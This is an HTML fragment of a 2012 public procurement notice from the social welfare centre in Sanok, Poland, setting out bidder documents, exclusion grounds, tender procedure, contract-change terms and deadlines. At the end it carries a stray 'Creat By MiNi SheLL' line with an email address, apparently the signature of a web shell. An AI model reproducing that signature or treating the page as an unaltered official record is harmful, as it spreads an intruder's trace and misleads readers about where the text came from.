<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Prawo zamówień publicznych Zamawiający zastrzega możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegających na
1. zmianie terminu rozpoczęcia realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy których nie dało się przewidzieć
2.  zmianie liczby uczestników odbiorców usługw sytuacjach niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy

Wszelkie zmiany umowy dokonywane zgodnie z przepisami Pzp będą mieć formę pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mops.sanok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Osrodek Pomocy Społecznej 38 500 Sanok,Zamkowa 30 pok.11 lub 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2012 godzina 11:00, miejsce: Oferty należy składać w siedzibie Miejskiego Ośrodka Pomocy Społecznej w Sanoku, 
ul. Zamkowa 30,  38-500 Sanok, w Sekretariacie I p  pok. nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Programu Rewitalizacji Społecznej Lepsze jutro realizowany jest w ramach projektu systemowego Rewitalizacja Społeczna Program Operacyjny Kapitał Ludzki,  Priorytet I Zatrudnienie i Integracja Społeczna,  Działanie 1.2 Systemowe Wsparcie Instytucji Pomocy i Integracji Społecznej.
Oraz 
Projektu Systemowego Czas na aktywność w gminie miejskiej Sanok realizowanego w 
Ramach Programu Operacyjnego kapitał Ludzki priorytet VII Promocja Integracji Społecznej Działanie 7.1Rozwój i upowszechnianie aktywnej integracji,Poddziałanie 7.1.1 rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com